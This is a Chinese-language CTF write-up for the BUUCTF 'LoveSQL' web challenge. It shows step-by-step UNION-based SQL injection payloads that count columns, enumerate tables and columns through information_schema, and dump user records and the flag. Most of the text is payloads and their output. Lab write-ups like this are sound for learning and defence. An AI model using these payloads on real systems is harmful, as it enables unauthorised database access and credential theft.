[BUUCTF][Web][極客大挑戰 2019]LoveSQL 1
阿新 • • 發佈:2022-12-11
開啟靶機url,頁面顯示有兩個輸入框,框中輸入123',發現兩個框都有sql注入問題
爆出一下錯誤
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''123''' at line 1
嘗試以下注入,爆出資料庫名稱
123'; database() #
返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'database() #'' at line 1
說明不能使用堆疊注入這麼搞
嘗試union注入
123' union select 1 #
返回
The used SELECT statements have a different number of columns
說明有戲!繼續增加select欄位常數的個數,最後到這個時返回正常
123' union select 1,2,3 #
返回
Login Success!
Hello 2!
Your password is '3'
說明展示的是查詢的第二個欄位和和第三個欄位
構造sql
123' union select 1,database(),3 #
返回
Hello geek! Your password is '3'
成功之道資料庫叫 geek
再次構造sql查出表名
# 這裡寫不行,3 放到最後會爆語法錯誤
123' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database(),3 #
# 這樣寫ok,把子查詢放到最後
123' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database() #
返回
Hello 2! Your password is 'geekuser,l0ve1ysq1'
推測flag內容在l0ve1ysq1,開始爆該表的欄位
123' union select 1,2, group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
返回
Hello 2!
Your password is 'id,username,password'
有了表名和列名,就可以嘗試把資料查出來,構造sql
123' union select id,username,password from l0ve1ysq1 limit 1 #
123' union select id,username,password from l0ve1ysq1 limit 2,1 #
返回
Hello cl4y!
Your password is 'wo_tai_nan_le'
說明這麼搞ok
換種快速的方式
# 這樣也ok,但是有點慢
123' union select id,username,password from l0ve1ysq1 limit 2,1 #
# 這樣更ok,快一點
123' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
返回
Hello 2!
Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{172a03e1-ad34-4139-8e61-8cb1c747e4a8}'